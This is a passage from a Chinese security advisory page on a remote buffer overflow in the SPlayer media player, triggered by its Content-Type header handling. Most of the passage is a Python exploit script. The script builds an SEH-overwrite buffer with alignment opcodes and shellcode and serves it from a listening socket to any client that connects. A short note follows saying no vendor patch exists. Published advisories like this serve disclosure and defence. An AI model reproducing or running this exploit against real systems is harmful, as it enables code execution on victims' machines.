Type”标头远程缓冲区溢出漏洞(2)

#Begin evil buffer
        evil = "\x41" * 2073
        evil += "\x61\x73"        #popad/nop align

evil += "\x25\x73"        #SE handler - ppr/splayer.exe [0x00730025]

#Close the blinds
        evil += "\x73"            #nop/align
        evil += "\x55"            #push ebp
        evil += "\x73"            #nop/align
        evil += "\x58"            #pop eax
        evil += "\x73"            #nop/align

#Align to EAX/execute shellcode
        evil += "\x05\x19\x11"        #add eax, 0x11001900
        evil += "\x73"            #nop/align
        evil += "\x2d\x11\x11"        #sub eax, 0x11001100
        evil += "\x73"            #nop/align
        evil += "\x50"            #push eax
        evil += "\x73"            #nop/align
        evil += "\xc3"            #ret

evil += "\x46" * 1004        #align shellcode->EAX
        #End evil buffer

padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"
        payload = pre + evil + calcshell + padding

try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind((bindaddr, bindport))
            s.listen(5)
            print "[+] Listening for incoming connections on port: %d" % bindport + " ..."
        except:
            print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
            sys.exit()

# Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
        # and it crashes after the second request

while 1:
            (clientsock, address) = s.accept()
            print "[*] New connection from", address[0]
            clientsock.recv(1024)
            sent = clientsock.send(payload)
            print "[+] Payload sent successfully [size: %d bytes]" % sent
            sent = 0
            print "[-] Closing connection to", address[0]
            clientsock.close()

if __name__ == "__main__":
    Client().about()
    Client().run()

建议:
--------------------------------------------------------------------------------
厂商补丁:

Splayer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwxsxx.html